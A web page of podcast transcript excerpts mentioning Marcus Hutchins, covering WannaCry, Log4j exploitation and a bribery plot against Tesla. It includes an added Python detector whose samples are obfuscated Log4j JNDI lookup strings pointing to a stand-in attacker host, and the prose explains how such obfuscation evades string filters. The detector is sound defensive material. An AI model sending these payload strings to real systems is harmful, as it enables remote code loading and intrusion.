3 Burst results for "Marcus Hutchins"

WBUR
"marcus hutchins" Discussed on WBUR
"The voice you heard was Marcus Hutchins, who, as the news report said, brought the chaos to a halt. His story is a complex one. He was an expert in malware, but he'd also created his own several years earlier. He saved the day, but a few months later he went to the U.S. and was arrested by the FBI, and pleaded guilty to two offenses. I spoke to him from his home in LA, and I asked him if it felt like 5 years had really passed.

Honestly, no. It feels like a couple of years have just vanished, I guess due to COVID. It's not really something I think about these days. It's always been something that's like, it happened, but it's not something I really think about.

I mean, you were kind of a global household name for a while. Did you expect that level of recognition?

No. It kind of just felt like a dream for most of it. Everything just went so out of control so fast that it almost feels like it didn't happen. Even today it doesn't feel like a real thing.

We haven't seen anything like the chaos that WannaCry caused again, but the ransomware itself hasn't gone away, has it?

Yeah, so WannaCry itself is still infinitely circling the globe, and we've seen major ransomware attacks since, but we've never seen a widespread global worm like WannaCry.

Do you think we will see another one?

I don't want to say that we won't, but the catalyst that led to WannaCry was so unique and had so many different factors that I think it's quite unlikely we will see something like that again. But that's not to say we won't see major widespread damage from cyberattacks; just WannaCry specifically was a very unique set of circumstances.

Do you think that institutions like the NHS have learned their lesson? Do you think they're better protected now than they were?

I think the NHS specifically, they did learn a lesson, and they went and they did a lot of upgrades and they restructured a lot of things. But then there are plenty of organizations who were like, it missed us. We didn't get hit by WannaCry, therefore we don't really need to do anything.

Can I talk to you about what happened with the FBI?

Sure.

Were you shocked when you were arrested?

I wouldn't say I was shocked. I always knew that that was likely a thing that would come back to bite me. I was just shocked that it took so long.

Did you feel like you'd sort of redeemed yourself by saving the world after that?

Honestly, no. But no, I didn't personally feel like it was undeserved because I had done this good thing.

Do you regret that now? The malware, I mean.

I regretted it pretty much immediately after I did it. I fully take responsibility for it. I was young, but it wasn't like I was 5 years old; I was old enough to probably know better.

What, in your opinion, are the biggest threats at the moment?

I think it's a combination of major ransomware groups who target corporations, and cyberattacks for destructive purposes and for profit being launched by governments.

It's a bit of a cat and mouse game, isn't it? Do you think that the good guys are winning?

I don't think it is really a game where the good guys win. It's kind of always just the bad guys are going to do their thing, and then we can do our best to try and slow them down or stop them. But when one side has to stay within the law and the other is free to do whatever, it's never really a game you win.

Marcus Hutchins there. Joe and Lisa, we were really caught on the back foot by WannaCry, weren't we, in 2017?

Yeah, I mean, I still remember where I was. I was only just starting my kind of cybersecurity interest, and I was in a car park in Bath, and I was doing a different story for Sky News at the time. And I remember seeing these reports coming in on Twitter of hospital after hospital falling to this virus, this cyberattack, and I just thought to myself, I didn't even know this was possible. This was the first time I'd seen anything like it, and it occupied my work and my brain for the next few months.

Yeah, definitely. I think for me what was kind of surprising was it had huge impact and huge media interest, and kind of, I guess, spread horror throughout most of the world. But then conversely, when we look back on it after a few weeks, it was actually pretty unsuccessful. So certainly from a payment perspective, they made some really fundamental mistakes that essentially meant money just wasn't paid into it, which you normally would relate to ransomware. So it's kind of a strange attack in that respect, I think. It caused huge scare, huge horror within the population, but yet was also relatively unsuccessful.

And that's probably why people didn't really know where it came from at the time. People were so confused by it, because it looked like a criminal enterprise, but it was a really bad criminal enterprise. It was also out of control, and I think that's something that you don't tend to see with ransomware nowadays. Moving on from WannaCry, I suppose you could argue that WannaCry sort of really revolutionized how threat actors operate. You see it as quite a slick operation, relatively speaking: Bitcoin wallet and the unique ID for payment, and all of this is very, very beautifully curated.

They have customer service departments now.

Exactly, exactly. And it's this sort of widespread professionalization of it. The Conti leaks that happened really recently show us exactly, you know, if you removed the references to ransomware or to organized crime, it would look like communications from any company anywhere in the world and would not surprise you. And I think that's actually pretty horrifying. And we sit here, don't we, all the time and go, don't pay the ransom, don't give the criminals the money, but the reality is that lots of people do, because actually that is your easiest way out.

Yeah, and there was a report by Chainalysis that was released in January of this year, and they said that there had been a 300% increase in payments since 2019. So payments are going up. The World Economic Forum released a risk report again this year, and they said that there were 435% more ransomware attacks, and it's led to this outpacing of our ability to actually defend or respond to them.

It's hard to know why that is, because you'd think we'd be better prepared after something like WannaCry. And of course after WannaCry there was the NotPetya attack, which is the most devastating financially that we've ever seen. Again, that was an out-of-control wormable ransomware like we saw with WannaCry. Luckily no one was harmed in that sense, and WannaCry is the only time really that we've seen a massive cyberattack that's really impacted people in sort of healthcare. But you'd think after all these events we'd be a bit better prepared. But there are still companies falling victim all the time, because I think the ransomware crews are now, as Lisa says, so well organized and so targeted in their work. They can spend and invest months of time gaining access into a big organization's network. And then what we're also seeing is, if there was an unwillingness to pay maybe a year ago, because maybe the companies don't want to and they've got better backups, what we're now seeing of course is ransomware crews are spending even more time digging through the documents, the emails, the pictures even of these corporate networks, and digging out some dirt and saying, look, not only will you need to pay us to get your data back, but if you don't pay us, we'll publish online. So perhaps that's why we're seeing more payments. We like to be."

Security Now
"marcus hutchins" Discussed on Security Now
"JNDI, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as LDAP, LDAPS, RMI, DNS, IIOP, or HTTP, precedes the attacker domain. As security teams work to detect the exploitation of the vulnerability, attackers, not surprisingly, have added obfuscation to these requests to evade (and I'll put in my own comments: simple-minded) detection, to evade detections based on request patterns. Microsoft wrote, we've seen things like running a lower or upper Java command within the exploitation string. So for example, open curly, JNDI, colon, and instead of saying just LDAP, they'll do dollar, open curly, lower, L, close curly, dollar, open curly, lower, colon, D, in order to break up the simple text pattern, so that simple matching will not be able to see LDAP there. And they said, an even more complicated obfuscation attempt, and then there's another example of crazy stuff, that are all trying to bypass string-matching detections. At the time of the publication, they said the vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. And that's absolutely the case. I didn't go into it because there's too much. I wouldn't even know what to talk about. There's just so much happening right now. They said, based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin mining, Cobalt Strike beacons, two of which we talked about a couple weeks ago, to enable credential theft and lateral movement, and exfiltrating data from compromised systems. It is a free-for-all right now. On Saturday, December 11th, Cloudflare's CEO, Matthew Prince, tweeted, quote, earliest evidence we've found so far of Log4j exploit is 2021-12-01, and then a time UTC. He says that suggests it was in the wild at least 9 days before being publicly disclosed. However, we don't see evidence of mass exploitation until after public disclosure. So it was being used selectively until everyone knew about it; then it was, get in there before they patch. And on Sunday, the day before yesterday, Marcus Hutchins tweeted, Kryptos Logic's Log4j scanner discovered more than 10,000 vulnerable hosts using simple HTTP header probing. That he tweeted on the 12th, two days ago. Wikipedia has some additional information, first telling us a bit more about the underlying Log4j framework. Wikipedia said Log4j is an open-source logging framework that allows software developers to log various data within their application. This data can also include user input. It is used ubiquitously in Java applications, especially enterprise software. Originally written in 2001, it is now part of Apache Logging Services, a project of the Apache Software Foundation."
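The evasion Microsoft describes in the excerpt above works only against filters that match the raw string. As an added example (written for this page, not code from the podcast or from Microsoft), the detector below resolves Log4j 2 `lower`, `upper` and default-value (`${name:-x}`) lookups from the inside out before matching, so `${jndi:ldap` reappears; the header values and the `attacker.example` host are constructed placeholders.

```python
import re

# Constructed sample header values (not taken from the page); the host is a
# placeholder, not a real indicator.
SAMPLES = {
    "plain":   "${jndi:ldap://attacker.example/a}",
    "lower":   "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.example/a}",
    "default": "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://attacker.example/a}",
    "mixed":   "${${upper:j}${lower:n}${::-d}i:rmi://attacker.example/o}",
    "benign":  "Mozilla/5.0 (X11; Linux x86_64) mode=${env:APP_MODE:-prod}",
}

# Innermost Log4j 2 lookups that the obfuscation abuses. ${lower:x}/${upper:x}
# change case; ${name:-x} is the default-value form, which yields the literal x
# when 'name' resolves to nothing (the ${::-x} trick relies on exactly that).
_LOWER = re.compile(r"\$\{\s*lower\s*:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{\s*upper\s*:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")

# The pattern a naive filter looks for; here it is applied after normalisation.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|https?|corba)\s*:", re.IGNORECASE
)


def normalize(value: str, max_rounds: int = 20) -> str:
    """Collapse case and default-value lookups, innermost first, until stable.

    Only lookups with no nested ${...} inside match, so each round expands one
    nesting level the way Log4j's substitutor would; max_rounds bounds the
    work on adversarial input.
    """
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), value)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


def is_jndi_lookup(value: str) -> bool:
    """True when the normalized value contains a ${jndi:<scheme>:...} lookup."""
    return _JNDI.search(normalize(value)) is not None


def scan(samples=SAMPLES):
    """Per sample: (naive match on the raw string, match after normalizing)."""
    return {k: (bool(_JNDI.search(v)), is_jndi_lookup(v)) for k, v in samples.items()}
```

Running `scan()` shows the raw-string filter catching only the plain sample while the normalized check flags all four lookup variants and leaves the benign header alone.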

Security Now
Russian Tries to Hack Tesla
"Almost a state-sponsored spy story. We have something that really happened, and I teased this by quoting our friend Marcus Hutchins' Twitter reaction upon learning of it. Just to remind everyone, Marcus is the well-known security researcher and reformed cybercrime hacker. You know, he actually reformed in his teenage years, but the FBI didn't forgive him for that, and of course, as we know, his future became uncertain when the FBI grabbed him in Las Vegas's Logan Airport as he was departing, or preparing to depart, from the US for his home in the UK, following the annual Black Hat and DEF CON conferences. Well, last Thursday, reacting on Twitter to the news of this story, which had just broken, Marcus quite correctly observed, he tweeted, quote: One of the benefits of cybercrime is criminals don't have to expose themselves to unnecessary risk by conducting business in person. Flying into the US jurisdiction to have malware manually installed on a company's network is absolutely insane. Unquote.

Okay. So what was all that about? A twenty-seven-year-old Russian national by the name of Egor Igorevich Kriuchkov traveled to the US and attempted to subvert and bribe an employee working at Tesla Corporation's massive Nevada-based Gigafactory. Egor ultimately agreed to pay the employee one million dollars to plant malware inside Tesla's internal network. The good news is the employee reported the offer to his employer, Tesla, and then worked with the FBI to build an airtight case and to set up a sting, which included having him covertly record face-to-face meetings discussing this twenty-seven-year-old Russian's proposal. In their complaint, which followed Egor's arrest and arraignment last Tuesday, the prosecutors wrote: The purpose of the conspiracy was to recruit an employee of a company to surreptitiously transmit malware provided by the co-conspirators into the company's computer system, exfiltrate data from the company's network, and threaten to disclose the data online unless the company paid the co-conspirators' ransom demand.

The complaint said that the malware would be custom developed to propagate through the company's network. For it to work, the group said, it needed the employee to provide information about the employer's network authorizations and network procedures. Kriuchkov said the malware would be transmitted either by inserting a USB drive into a company computer or clicking on an email attachment containing malware. Egor explained the infected computer would have to run continuously for six to eight hours for the malware to move fully through the network. To distract network personnel, a first stage of the malware would perform a denial-of-service attack while a second stage performed the data exfiltration. When the complaint was initially unsealed last Tuesday, the identities of all parties were still confidential, being identified only as Company A and CHS-1, which is their abbreviation for Confidential Human Source number one, that is, the employee. But last Thursday Elon Musk confirmed that yes, indeed, it was his company that was the target of this whole operation. The charging document, which was filed in federal court in Nevada, detailed an extensive and determined attempt to infect Tesla's network. The defendant, again twenty-seven-year-old Egor Igorevich Kriuchkov, allegedly traveled from Russia to Nevada and then met with the unnamed employee on multiple occasions. When Egor's initial five hundred thousand dollar bid failed to clinch the deal, the defendant doubled the offer to one million dollars. According to the complaint, Kriuchkov wined and dined and boozed up the employee, and when discussing especially sensitive details, conducted conversations in cars. When FBI agents couldn't conduct physical surveillance in restaurants or bars, the employee recorded them.

One meeting occurred on August seventh in a car Kriuchkov had rented. Referring to the employee again as CHS-1, the prosecutors described that seventh meeting as follows. They said: During this meeting, which the FBI had consensually recorded, Kriuchkov reiterated some of the details of the criminal activity previously proposed to CHS-1. Kriuchkov described the malware attack as he did before, adding that the first part of the attack, a DDoS, would be "successful" for the group, but the victim company's security officers would think the attack had failed. Kriuchkov, and here's some news, again listed prior companies this group had targeted. Kriuchkov stated each of these targeted companies had a person working at those companies who installed malware on behalf of the group. To ease CHS-1's concerns about getting caught, Kriuchkov claimed the oldest project the group had worked on took place three and a half years ago, and the group's co-optee still worked for the company."